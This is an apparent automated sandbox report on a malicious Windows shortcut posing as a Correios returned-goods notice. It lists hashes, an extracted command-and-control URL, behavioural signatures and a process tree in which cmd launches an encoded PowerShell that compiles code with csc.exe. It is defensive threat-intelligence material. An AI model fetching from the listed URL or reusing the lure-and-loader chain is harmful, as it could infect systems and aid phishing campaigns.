Analysis
max time kernel: 121s
max time network: 122s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 12/09/2024, 10:43
Static task: static1
Behavioral task: behavioral1
    Sample: Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
    Resource: win7-20240903-en
Behavioral task: behavioral2
    Sample: Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
    Resource: win10v2004-20240802-en
General
Target: Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
Size: 3KB
MD5: 246e74b6fffb9d5994f7f70bb6509b45
SHA1: 4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256: 0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512: 178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
Extracted: https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
Signatures

Blocklisted process makes network request (2 IoCs)
    flow  pid   Process
    5     2712  powershell.exe
    6     2712  powershell.exe

Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (2 IoCs)
    pid   Process
    2712  powershell.exe
    2712  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
    description               pid   Process
    Token: SeDebugPrivilege   2712  powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
    description                         pid   Process         procid_target
    PID 2356 wrote to memory of 2712    2356  cmd.exe         31
    PID 2356 wrote to memory of 2712    2356  cmd.exe         31
    PID 2356 wrote to memory of 2712    2356  cmd.exe         31
    PID 2712 wrote to memory of 2988    2712  powershell.exe  32
    PID 2712 wrote to memory of 2988    2712  powershell.exe  32
    PID 2712 wrote to memory of 2988    2712  powershell.exe  32
    PID 2988 wrote to memory of 2620    2988  csc.exe         33
    PID 2988 wrote to memory of 2620    2988  csc.exe         33
    PID 2988 wrote to memory of 2620    2988  csc.exe         33
Processes

1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
   PID: 2356
   - Suspicious use of WriteProcessMemory

   2. C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en 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
      PID: 2712
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
         Command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6l9lcnmq.cmdline"
         PID: 2988
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
            Command line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD09.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBD08.tmp"
            PID: 2620
Network
MITRE ATT&CK Enterprise v15
Downloads